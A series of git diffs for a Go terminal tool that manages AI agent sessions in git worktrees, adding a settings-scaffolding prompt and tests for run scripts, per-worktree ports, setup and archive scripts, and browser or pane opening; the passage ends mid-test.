+
+// runInitState is the offer to give a project its first settings file: where
+// it would go, and whether the repository root could be found at all.
+type runInitState struct {
+	root string
+	path string
+}
+
+// openRunInit offers to scaffold settings for the repository the cursor sits
+// in. The file belongs at the repository root rather than the session's
+// directory, so a session started in a subdirectory still configures the
+// project rather than leaving a stray settings file down a level.
+func (m *Model) openRunInit(dir string) (tea.Model, tea.Cmd) {
+	root := dir
+	if m.gitDrv != nil {
+		if found, err := m.gitDrv.RepoRoot(dir); err == nil && found != "" {
+			root = found
+		}
 	}
-	return "no " + where + " in this repo: add one with a [run.dev] block to run a project command here"
+	m.runInit = runInitState{root: root, path: project.SettingsPath(root)}
+	m.mode = modeRunInit
+	m.errBar.text = ""
+	return m, nil
+}
+
+// createRunSettings writes the starter file and opens it, so the reader lands
+// in the thing they just agreed to fill in rather than being told where it
+// is. A machine with no editor still gets the file and is told the path.
+func (m *Model) createRunSettings() (tea.Model, tea.Cmd) {
+	path, err := project.Scaffold(m.runInit.root)
+	m.mode = modeList
+	if err != nil {
+		m.errBar.text = err.Error()
+		return m, nil
+	}
+	m.reportDone("created " + path)
+	return m.openInEditor(path)
+}
+
+func (m *Model) handleRunInitKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
+	switch msg.String() {
+	case "esc", "q", "ctrl+c", "n":
+		m.mode = modeList
+		return m, nil
+	case "enter", "y":
+		return m.createRunSettings()
+	}
+	return m, nil
+}
+
+func (m *Model) viewRunInit() string {
+	var b strings.Builder
+	b.WriteString(mutedStyle.Render("This project has no run scripts or setup script yet."))
+	b.WriteString("\n\n")
+	// Repository name plus the relative path rather than the absolute one: a
+	// checkout under a long path truncates in the card, and the half that
+	// survives would be the half the reader already knows.
+	b.WriteString(valueStyle.Render(
+		filepath.Join(filepath.Base(m.runInit.root), project.Dir, project.File)))
+	b.WriteString("\n\n")
+	b.WriteString(subtleStyle.Render("A commented starter, so nothing changes until you fill it in:"))
+	b.WriteString("\n")
+	b.WriteString(subtleStyle.Render("  setup    bootstraps every new worktree before its agent starts"))
+	b.WriteString("\n")
+	b.WriteString(subtleStyle.Render("  [run.*]  commands p offers, each on its own $" + project.EnvPort))
+	hint := [][2]string{{"↵", "create and open it"}, {"esc", "cancel"}}
+	return m.card("▶ Project settings", b.String(), hint)
 }
 
 // startRun spawns the script as a terminal tab. It is a shell session like

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -206,7 +206,7 @@ func TestRunScriptReceivesThePortInItsEnvironment(t *testing.T) {
 	}
 	// The pane resolves symlinks, so compare against the port the resolved
 	// directory name yields rather than the temp path as written.
-	settings, err := project.Load(dir)
+	settings, err := project.Load(dir, dir)
 	if err != nil {
 		t.Fatalf("load: %v", err)
 	}

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -1,6 +1,7 @@
 package ui
 
 import (
+	"net"
 	"os"
 	"path/filepath"
 	"strconv"
@@ -182,7 +183,7 @@ func TestRunScriptReceivesThePortInItsEnvironment(t *testing.T) {
 	onSessionIn(t, m, dir)
 
 	pressRunKey(t, m)
-	if m.errBar.text != "" {
+	if m.errBar.text != "" && !m.errBar.worked() {
 		t.Fatalf("run reported %q", m.errBar.text)
 	}
 
@@ -545,5 +546,94 @@ func TestRunScriptReceivesThePortUnderBothNames(t *testing.T) {
 	}
 	if fields[0] != fields[1] {
 		t.Fatalf("PORT = %s but %s = %s", fields[0], project.EnvPort, fields[1])
+	}
+}
+
+// Starting a server and looking at it should be one keystroke apart, so the
+// message p leaves behind has to carry the port and point at the key.
+func TestRunKeyReportsThePortAndHowToOpenIt(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+
+	pressRunKey(t, m)
+
+	settings, err := project.Load(dir, dir)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	port := strconv.Itoa(settings.Port(portKey(resolved(t, dir))))
+	if !strings.Contains(m.errBar.text, port) {
+		t.Fatalf("message %q should carry the port %s", m.errBar.text, port)
+	}
+	if !strings.Contains(m.errBar.text, "O") {
+		t.Fatalf("message %q should point at the key that opens it", m.errBar.text)
+	}
+	if !m.errBar.worked() {
+		t.Fatalf("starting a script is an outcome, not a failure: %q", m.errBar.text)
+	}
+}
+
+// A browser error page says nothing about which of the two things went
+// wrong, so a port with nothing on it is reported rather than opened.
+func TestOpenKeyRefusesWhenNothingIsListening(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+
+	_, _ = m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{'O'}})
+
+	if m.errBar.worked() {
+		t.Fatalf("opening a dead port reported success: %q", m.errBar.text)
+	}
+	if !strings.Contains(m.errBar.text, "nothing listening") {
+		t.Fatalf("message = %q, want it to say nothing is listening", m.errBar.text)
+	}
+	// The fix is the other key, so the message has to name it.
+	if !strings.Contains(m.errBar.text, "press p") {
+		t.Fatalf("message = %q, want it to point at p", m.errBar.text)
+	}
+}
+
+func TestOpenKeyOpensTheServerThatIsListening(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+
+	settings, err := project.Load(dir, dir)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	port := settings.Port(portKey(resolved(t, dir)))
+	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(port)))
+	if err != nil {
+		t.Skipf("cannot bind %d here: %v", port, err)
+	}
+	defer listener.Close()
+
+	_, cmd := m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{'O'}})
+
+	if !m.errBar.worked() {
+		t.Fatalf("opening a live server reported %q", m.errBar.text)
+	}
+	want := "http://localhost:" + strconv.Itoa(port)
+	if !strings.Contains(m.errBar.text, want) {
+		t.Fatalf("message = %q, want the url %s", m.errBar.text, want)
+	}
+	if cmd == nil {
+		t.Fatal("O should return a command that opens the browser")
+	}
+}
+
+// A repository with no settings has no port to open, and saying so points at
+// the key that would give it one.
+func TestOpenKeyWithoutSettingsPointsAtP(t *testing.T) {
+	m := buildModel(t)
+	onSessionIn(t, m, t.TempDir())
+
+	_, _ = m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{'O'}})
+
+	if !strings.Contains(m.errBar.text, "press p") {
+		t.Fatalf("message = %q, want it to point at p", m.errBar.text)
 	}
 }

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -1,0 +1,290 @@
+package ui
+
+import (
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/YoanWai/agent-manager/internal/project"
+	tea "github.com/charmbracelet/bubbletea"
+)
+
+// writeProject drops a .agent-manager/settings.toml into dir and hands back
+// dir, so a test reads as "a repository configured like this".
+func writeProject(t *testing.T, dir, body string) string {
+	t.Helper()
+	settingsDir := filepath.Join(dir, project.Dir)
+	if err := os.MkdirAll(settingsDir, 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+	if err := os.WriteFile(filepath.Join(settingsDir, project.File), []byte(body), 0o644); err != nil {
+		t.Fatalf("write settings: %v", err)
+	}
+	return dir
+}
+
+func pressRunKey(t *testing.T, m *Model) {
+	t.Helper()
+	_, cmd := m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{'p'}})
+	m.applyCmd(t, cmd)
+}
+
+// onSessionIn puts the cursor on an agent session working in dir, which is
+// the state every p press is made from.
+func onSessionIn(t *testing.T, m *Model, dir string) {
+	t.Helper()
+	createSession(t, m, "agent", dir, "")
+	m.selectSessionRow(t, "agent")
+}
+
+func TestRunKeyWithoutSettingsExplainsWhereToPutThem(t *testing.T) {
+	m := buildModel(t)
+	onSessionIn(t, m, t.TempDir())
+
+	before := len(m.sessions)
+	pressRunKey(t, m)
+
+	if len(m.sessions) != before {
+		t.Fatal("p spawned something for a project with no settings")
+	}
+	if m.mode != modeList {
+		t.Fatalf("mode = %v, want the list", m.mode)
+	}
+	// The error is the only documentation on screen, so it has to name the
+	// file the user is meant to create.
+	want := filepath.Join(project.Dir, project.File)
+	if !strings.Contains(m.errBar.text, want) {
+		t.Fatalf("error %q should name %q", m.errBar.text, want)
+	}
+}
+
+func TestRunKeyWithSettingsButNoScriptsSaysSo(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "setup = \"true\"\n")
+	onSessionIn(t, m, dir)
+
+	pressRunKey(t, m)
+
+	if !strings.Contains(m.errBar.text, "no run scripts") {
+		t.Fatalf("error = %q, want it to mention missing run scripts", m.errBar.text)
+	}
+}
+
+func TestRunKeyRunsTheOnlyScriptWithoutAsking(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+
+	pressRunKey(t, m)
+
+	if m.mode != modeList {
+		t.Fatalf("a single script should not open the picker, mode = %v", m.mode)
+	}
+	sess, ok := m.selected()
+	if !ok || !m.isShell(sess.Tool) {
+		t.Fatalf("cursor should be on the new run session, got %+v", sess)
+	}
+	// Named after both the script and the session it runs beside, so two
+	// worktrees running "dev" stay tellable apart.
+	if !strings.HasPrefix(sess.Name, "dev") || !strings.Contains(sess.Name, "agent") {
+		t.Fatalf("run session name = %q, want it to carry dev and agent", sess.Name)
+	}
+}
+
+func TestRunKeyRunsTheDefaultWithoutAsking(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(),
+		"[run.dev]\ncommand = \"cat\"\ndefault = true\n\n[run.test]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+
+	pressRunKey(t, m)
+
+	if m.mode != modeList {
+		t.Fatalf("a marked default should not open the picker, mode = %v", m.mode)
+	}
+	sess, _ := m.selected()
+	if !strings.HasPrefix(sess.Name, "dev") {
+		t.Fatalf("run session name = %q, want the default script", sess.Name)
+	}
+}
+
+func TestRunKeyOpensThePickerWhenAmbiguous(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(),
+		"[run.dev]\ncommand = \"cat\"\n\n[run.test]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+	before := len(m.sessions)
+
+	pressRunKey(t, m)
+
+	if m.mode != modeRunPick {
+		t.Fatalf("mode = %v, want the run picker", m.mode)
+	}
+	if len(m.sessions) != before {
+		t.Fatal("the picker must not have started anything yet")
+	}
+	if len(m.runPick.names) != 2 {
+		t.Fatalf("picker rows = %v, want both scripts", m.runPick.names)
+	}
+	// The card has to render without panicking on a partially built state.
+	if view := m.View(); !strings.Contains(view, "dev") {
+		t.Fatalf("picker view is missing its rows: %q", view)
+	}
+}
+
+func TestRunPickerEscapeLeavesEverythingAlone(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(),
+		"[run.dev]\ncommand = \"cat\"\n\n[run.test]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+	pressRunKey(t, m)
+	before := len(m.sessions)
+
+	_, _ = m.Update(tea.KeyMsg{Type: tea.KeyEsc})
+
+	if m.mode != modeList {
+		t.Fatalf("mode = %v, want the list back", m.mode)
+	}
+	if len(m.sessions) != before {
+		t.Fatal("escaping the picker started something")
+	}
+}
+
+func TestRunPickerEnterStartsTheSelectedScript(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(),
+		"[run.api]\ncommand = \"cat\"\n\n[run.web]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+	pressRunKey(t, m)
+
+	// Rows are sorted with no default, so down lands on web.
+	_, _ = m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{'j'}})
+	_, cmd := m.Update(tea.KeyMsg{Type: tea.KeyEnter})
+	m.applyCmd(t, cmd)
+
+	if m.mode != modeList {
+		t.Fatalf("mode = %v, want the list after running", m.mode)
+	}
+	sess, ok := m.selected()
+	if !ok || !strings.HasPrefix(sess.Name, "web") {
+		t.Fatalf("started %q, want the web script", sess.Name)
+	}
+}
+
+// The port is the feature's whole point: several worktrees serving at once.
+// It has to actually reach the pane's environment, not just the struct.
+func TestRunScriptReceivesThePortInItsEnvironment(t *testing.T) {
+	m := buildModel(t)
+	dir := t.TempDir()
+	out := filepath.Join(dir, "port")
+	writeProject(t, dir, "[run.dev]\ncommand = \"printf %s \\\"$"+project.EnvPort+"\\\" > "+out+" && cat\"\n")
+	onSessionIn(t, m, dir)
+
+	pressRunKey(t, m)
+	if m.errBar.text != "" {
+		t.Fatalf("run reported %q", m.errBar.text)
+	}
+
+	var body []byte
+	deadline := time.Now().Add(10 * time.Second)
+	for time.Now().Before(deadline) {
+		if b, err := os.ReadFile(out); err == nil && len(b) > 0 {
+			body = b
+			break
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
+	if len(body) == 0 {
+		t.Fatalf("%s never reached the pane", project.EnvPort)
+	}
+	port, err := strconv.Atoi(strings.TrimSpace(string(body)))
+	if err != nil {
+		t.Fatalf("%s = %q, not a number", project.EnvPort, body)
+	}
+	// The pane resolves symlinks, so compare against the port the resolved
+	// directory name yields rather than the temp path as written.
+	settings, err := project.Load(dir)
+	if err != nil {
+		t.Fatalf("load: %v", err)
+	}
+	if want := settings.Port(portKey(resolved(t, dir))); port != want {
+		t.Fatalf("%s = %d, want %d", project.EnvPort, port, want)
+	}
+}
+
+// A run script belongs to the directory the cursor is in, so the same script
+// in two worktrees is two sessions on two ports rather than one shared one.
+func TestRunScriptsInTwoWorktreesGetDifferentPorts(t *testing.T) {
+	settings := project.Settings{PortBase: project.DefaultPortBase}
+	if a, b := settings.Port("feature-a"), settings.Port("feature-b"); a == b {
+		t.Fatalf("two worktrees share port %d", a)
+	}
+}
+
+// A worktree is a fresh checkout: the setup script is what makes it
+// runnable, so it has to actually execute there, before the agent does.
+func TestWorktreeSpawnRunsTheProjectSetupScript(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	// The settings are committed, so the worktree checkout carries them.
+	writeProject(t, repo, "setup = \"touch setup-ran\"\n")
+	initGitRepo(t, repo)
+
+	if err := m.spawnSession("claude", "wt-setup", repo, "", "", false, true); err != nil {
+		t.Fatalf("spawn: %v", err)
+	}
+	sessions, err := m.store.ListSessions(true)
+	if err != nil {
+		t.Fatalf("list: %v", err)
+	}
+	marker := filepath.Join(sessions[0].Cwd, "setup-ran")
+	deadline := time.Now().Add(10 * time.Second)
+	for time.Now().Before(deadline) {
+		if _, err := os.Stat(marker); err == nil {
+			return
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
+	t.Fatalf("setup script never ran in the worktree (%s)", marker)
+}
+
+// A session spawned without a worktree works in a checkout the user already
+// set up by hand, so re-running setup there would be a surprise.
+func TestNonWorktreeSpawnLeavesSetupAlone(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	writeProject(t, repo, "setup = \"touch setup-ran\"\n")
+	initGitRepo(t, repo)
+
+	if err := m.spawnSession("claude", "plain", repo, "", "", false, false); err != nil {
+		t.Fatalf("spawn: %v", err)
+	}
+	time.Sleep(500 * time.Millisecond)
+	if _, err := os.Stat(filepath.Join(repo, "setup-ran")); err == nil {
+		t.Fatal("setup ran for a session that is not in a worktree")
+	}
+}
+
+// A setup script that fails must not hand a half-installed tree to an agent.
+func TestFailingSetupDoesNotStartTheAgent(t *testing.T) {
+	command := project.SetupCommand("false", "touch agent-ran")
+	if !strings.Contains(command, "false") {
+		t.Fatalf("setup missing from %q", command)
+	}
+	before, _, ok := strings.Cut(command, "else")
+	if !ok {
+		t.Fatalf("no failure branch in %q", command)
+	}
+	if !strings.Contains(before, "touch agent-ran") {
+		t.Fatalf("the agent should run on the success branch, got %q", before)
+	}
+}

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -586,8 +586,8 @@ func TestOpenKeyRefusesWhenNothingIsListening(t *testing.T) {
 	if m.errBar.worked() {
 		t.Fatalf("opening a dead port reported success: %q", m.errBar.text)
 	}
-	if !strings.Contains(m.errBar.text, "nothing listening") {
-		t.Fatalf("message = %q, want it to say nothing is listening", m.errBar.text)
+	if !strings.Contains(m.errBar.text, "no server") {
+		t.Fatalf("message = %q, want it to say there is no server", m.errBar.text)
 	}
 	// The fix is the other key, so the message has to name it.
 	if !strings.Contains(m.errBar.text, "press p") {
@@ -622,6 +622,51 @@ func TestOpenKeyOpensTheServerThatIsListening(t *testing.T) {
 	}
 	if cmd == nil {
 		t.Fatal("O should return a command that opens the browser")
+	}
+}
+
+// A TUI has nothing to serve, so O opens its pane instead of a browser.
+// This is the case that prompted it: testing a build of this manager.
+func TestOpenKeyAttachesToATuiRunSession(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.tui]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+	pressRunKey(t, m)
+
+	run, ok := m.selected()
+	if !ok || !m.isShell(run.Tool) {
+		t.Fatalf("expected a run session, got %+v", run)
+	}
+	// Nothing is listening, so the pane is the only thing to show.
+	_, cmd := m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{'O'}})
+
+	if !m.errBar.worked() {
+		t.Fatalf("O reported %q", m.errBar.text)
+	}
+	if !strings.Contains(m.errBar.text, "attaching") {
+		t.Fatalf("message = %q, want it to say it is attaching", m.errBar.text)
+	}
+	if cmd == nil {
+		t.Fatal("O should return a command that attaches the pane")
+	}
+}
+
+// A worktree with neither a server nor a pane says both halves, so the
+// reader knows which one they were expecting.
+func TestOpenKeyWithNothingRunningSaysBoth(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+
+	_, _ = m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{'O'}})
+
+	if m.errBar.worked() {
+		t.Fatalf("nothing was running, but O reported success: %q", m.errBar.text)
+	}
+	for _, want := range []string{"no server", "no run session", "press p"} {
+		if !strings.Contains(m.errBar.text, want) {
+			t.Fatalf("message = %q, want it to mention %q", m.errBar.text, want)
+		}
 	}
 }
 

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -11,6 +11,7 @@ import (
 
 	"github.com/YoanWai/agent-manager/internal/project"
 	tea "github.com/charmbracelet/bubbletea"
+	"github.com/charmbracelet/x/ansi"
 )
 
 // writeProject drops a .agent-manager/settings.toml into dir and hands back
@@ -275,7 +276,7 @@ func TestNonWorktreeSpawnLeavesSetupAlone(t *testing.T) {
 
 // A setup script that fails must not hand a half-installed tree to an agent.
 func TestFailingSetupDoesNotStartTheAgent(t *testing.T) {
-	command := project.SetupCommand("false", "touch agent-ran")
+	command := project.SetupCommand("false", "touch agent-ran", "")
 	if !strings.Contains(command, "false") {
 		t.Fatalf("setup missing from %q", command)
 	}
@@ -680,5 +681,196 @@ func TestOpenKeyWithoutSettingsPointsAtP(t *testing.T) {
 
 	if !strings.Contains(m.errBar.text, "press p") {
 		t.Fatalf("message = %q, want it to point at p", m.errBar.text)
+	}
+}
+
+// A shell has no turns for the status engine to track, so the foreground
+// command is the only signal that a run script is still going.
+func TestSessionRunningReadsThePaneCommand(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+	pressRunKey(t, m)
+
+	run, ok := m.selected()
+	if !ok {
+		t.Fatal("no run session")
+	}
+	for _, tc := range []struct {
+		command string
+		running bool
+	}{
+		{"cat", true}, {"node", true}, {"go", true},
+		{"zsh", false}, {"bash", false}, {"-zsh", false}, {"fish", false},
+		{"", false},
+	} {
+		m.paneCommands = map[string]string{run.ID: tc.command}
+		if got := m.sessionRunning(run); got != tc.running {
+			t.Errorf("pane command %q: running = %v, want %v", tc.command, got, tc.running)
+		}
+	}
+}
+
+// The indicator must not animate an agent, whose status the engine already
+// tracks properly.
+func TestSessionRunningIgnoresAgents(t *testing.T) {
+	m := buildModel(t)
+	createSession(t, m, "agent", t.TempDir(), "")
+	m.selectSessionRow(t, "agent")
+	sess, _ := m.selected()
+
+	m.paneCommands = map[string]string{sess.ID: "node"}
+	if m.sessionRunning(sess) {
+		t.Fatal("an agent session should never drive the run indicator")
+	}
+}
+
+// An idle manager must schedule nothing: the tick exists only while a script
+// is actually going.
+func TestWaveTickOnlyExistsWhileSomethingRuns(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+	pressRunKey(t, m)
+	run, _ := m.selected()
+
+	m.paneCommands = map[string]string{run.ID: "zsh"}
+	if cmd := m.waveTick(); cmd != nil {
+		t.Fatal("a manager with nothing running scheduled a tick")
+	}
+	m.paneCommands = map[string]string{run.ID: "node"}
+	if cmd := m.waveTick(); cmd == nil {
+		t.Fatal("a running script should keep the indicator moving")
+	}
+}
+
+// The glyph is one column, so it cannot push the name out of the row.
+func TestRunIndicatorIsOneColumn(t *testing.T) {
+	m := buildModel(t)
+	dir := writeProject(t, t.TempDir(), "[run.dev]\ncommand = \"cat\"\n")
+	onSessionIn(t, m, dir)
+	pressRunKey(t, m)
+	run, _ := m.selected()
+	m.paneCommands = map[string]string{run.ID: "node"}
+
+	seen := map[string]bool{}
+	for phase := range len(waveFrames) {
+		m.wavePhase = phase
+		glyph := ansi.Strip(m.sessionGlyph(run))
+		if width := ansi.StringWidth(glyph); width != 1 {
+			t.Fatalf("frame %d renders %d columns, want 1", phase, width)
+		}
+		seen[glyph] = true
+	}
+	if len(seen) < 2 {
+		t.Fatalf("the indicator never changed across a cycle: %v", seen)
+	}
+}
+
+// A project can ask for its server to be up before the agent is looked at.
+func TestAutoRunStartsAScriptForANewWorktree(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+	projectSettingsDir(t, repo, "[run.dev]\ncommand = \"cat\"\nauto = true\n")
+
+	if err := m.spawnSession("claude", "wt-auto", repo, "", "", false, true); err != nil {
+		t.Fatalf("spawn: %v", err)
+	}
+	var started bool
+	for _, sess := range m.sessions {
+		if m.isShell(sess.Tool) && strings.HasPrefix(sess.Name, "dev-") {
+			started = true
+		}
+	}
+	if !started {
+		t.Fatalf("no auto-run session was started: %+v", m.sessions)
+	}
+}
+
+// A worktree with no auto script must not gain a session it never asked for.
+func TestAutoRunStartsNothingWhenUnmarked(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+	projectSettingsDir(t, repo, "[run.dev]\ncommand = \"cat\"\n")
+
+	if err := m.spawnSession("claude", "wt-plain", repo, "", "", false, true); err != nil {
+		t.Fatalf("spawn: %v", err)
+	}
+	for _, sess := range m.sessions {
+		if m.isShell(sess.Tool) {
+			t.Fatalf("an unmarked script started anyway: %+v", sess)
+		}
+	}
+}
+
+// Whatever setup created outside the worktree — a database, a container, a
+// tunnel — is unreachable once git takes the directory away, so the archive
+// script gets its last chance here.
+func TestArchiveScriptRunsBeforeTheWorktreeGoes(t *testing.T) {
+	m := buildModel(t)
+	worktree := t.TempDir()
+	marker := filepath.Join(t.TempDir(), "cleaned")
+	writeProject(t, worktree, "archive = \"touch "+marker+"\"\n")
+
+	m.archiveWorktree(worktree, worktree)
+
+	if _, err := os.Stat(marker); err != nil {
+		t.Fatalf("archive script did not run: %v", err)
+	}
+	if m.errBar.text != "" {
+		t.Fatalf("a script that worked reported %q", m.errBar.text)
+	}
+}
+
+// The resources have leaked either way, so a failure is reported rather than
+// blocking the deletion the reader asked for.
+func TestArchiveScriptFailureIsReported(t *testing.T) {
+	m := buildModel(t)
+	worktree := t.TempDir()
+	writeProject(t, worktree, "archive = \"echo boom >&2; exit 3\"\n")
+
+	m.archiveWorktree(worktree, worktree)
+
+	if !strings.Contains(m.errBar.text, "archive script failed") {
+		t.Fatalf("message = %q, want it to report the failure", m.errBar.text)
+	}
+}
+
+func TestArchiveScriptGetsThePortEnvironment(t *testing.T) {
+	m := buildModel(t)
+	worktree := t.TempDir()
+	out := filepath.Join(t.TempDir(), "port")
+	writeProject(t, worktree, "archive = \"printf %s \\\"$PORT\\\" > "+out+"\"\n")
+
+	m.archiveWorktree(worktree, worktree)
+
+	body, err := os.ReadFile(out)
+	if err != nil {
+		t.Fatalf("archive script did not run: %v", err)
+	}
+	settings, err := project.Load(worktree, worktree)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if want := strconv.Itoa(settings.Port(portKey(worktree))); string(body) != want {
+		t.Fatalf("PORT = %q, want %q", body, want)
+	}
+}
+
+// A project with no archive script must not be charged for one.
+func TestArchiveWithoutAScriptDoesNothing(t *testing.T) {
+	m := buildModel(t)
+	worktree := writeProject(t, t.TempDir(), "setup = \"true\"\n")
+	m.archiveWorktree(worktree, worktree)
+	if m.errBar.text != "" {
+		t.Fatalf("reported %q for a project with no archive script", m.errBar.text)
 	}
 }

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -63,8 +63,11 @@ func TestRunKeyWithSettingsButNoScriptsSaysSo(t *testing.T) {
 
 	pressRunKey(t, m)
 
-	if !strings.Contains(m.errBar.text, "no run scripts") {
-		t.Fatalf("error = %q, want it to mention missing run scripts", m.errBar.text)
+	// The path is the useful half of the message, so it must survive whether
+	// or not this machine has an editor to open the file with.
+	if !strings.Contains(m.errBar.text, "no run scripts") ||
+		!strings.Contains(m.errBar.text, project.File) {
+		t.Fatalf("message = %q, want it to name the file with no run scripts", m.errBar.text)
 	}
 }
 

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -359,7 +359,7 @@ func TestScaffoldedSettingsAreInert(t *testing.T) {
 	if path != project.SettingsPath(root) {
 		t.Fatalf("wrote %q, want %q", path, project.SettingsPath(root))
 	}
-	settings, err := project.Load(root)
+	settings, err := project.Load(root, root)
 	if err != nil {
 		t.Fatalf("the scaffold does not parse: %v", err)
 	}
@@ -378,11 +378,169 @@ func TestScaffoldRefusesToOverwrite(t *testing.T) {
 	if _, err := project.Scaffold(root); err == nil {
 		t.Fatal("Scaffold overwrote existing settings")
 	}
-	settings, err := project.Load(root)
+	settings, err := project.Load(root, root)
 	if err != nil {
 		t.Fatalf("Load: %v", err)
 	}
 	if settings.Setup != "mine" {
 		t.Fatalf("existing settings were clobbered: %+v", settings)
+	}
+}
+
+// typeInto drives a text field the way the keyboard does, so the test
+// exercises the form rather than the model's internals.
+func typeInto(t *testing.T, m *Model, text string) {
+	t.Helper()
+	for _, r := range text {
+		_, _ = m.Update(tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{r}})
+	}
+}
+
+func focusGroupField(t *testing.T, m *Model, field int) {
+	t.Helper()
+	for range gfCount {
+		if m.groupForm.focus == field {
+			return
+		}
+		_, _ = m.Update(tea.KeyMsg{Type: tea.KeyTab})
+	}
+	t.Fatalf("never reached group form field %d", field)
+}
+
+// Setting up the project is when what it takes to bootstrap it is known, so
+// that is when the form asks.
+func TestGroupFormWritesProjectSettings(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+
+	m.openGroupForm()
+	typeInto(t, m, "backend")
+	focusGroupField(t, m, gfPath)
+	m.groupForm.path.SetValue(repo)
+	focusGroupField(t, m, gfSetup)
+	typeInto(t, m, "make deps")
+	focusGroupField(t, m, gfRun)
+	typeInto(t, m, "npm run dev")
+
+	_, cmd := m.submitGroupForm()
+	if m.mode != modeList {
+		t.Fatalf("submit left mode %v, err %q", m.mode, m.errBar.text)
+	}
+	m.applyCmd(t, cmd)
+
+	settings, err := project.Load(repo, repo)
+	if err != nil {
+		t.Fatalf("the written settings do not load: %v", err)
+	}
+	if settings.Setup != "make deps" {
+		t.Fatalf("setup = %q", settings.Setup)
+	}
+	name, ok := settings.DefaultRun()
+	if !ok {
+		t.Fatal("the run command should be written as the default script")
+	}
+	if got := settings.Run[name].Command; got != "npm run dev" {
+		t.Fatalf("command = %q", got)
+	}
+}
+
+// A group created without answering either question is a group, not a
+// project the reader asked to configure.
+func TestGroupFormWritesNothingWhenBothFieldsAreEmpty(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+
+	m.openGroupForm()
+	typeInto(t, m, "plain")
+	focusGroupField(t, m, gfPath)
+	m.groupForm.path.SetValue(repo)
+
+	if _, cmd := m.submitGroupForm(); m.mode == modeList {
+		m.applyCmd(t, cmd)
+	}
+	if _, err := os.Stat(project.SettingsPath(repo)); err == nil {
+		t.Fatal("a settings file was written for a group that asked for none")
+	}
+}
+
+// A project that already has settings shows them rather than an empty box,
+// and the form does not rewrite the file it cannot round-trip.
+func TestGroupFormShowsExistingSettingsReadOnly(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
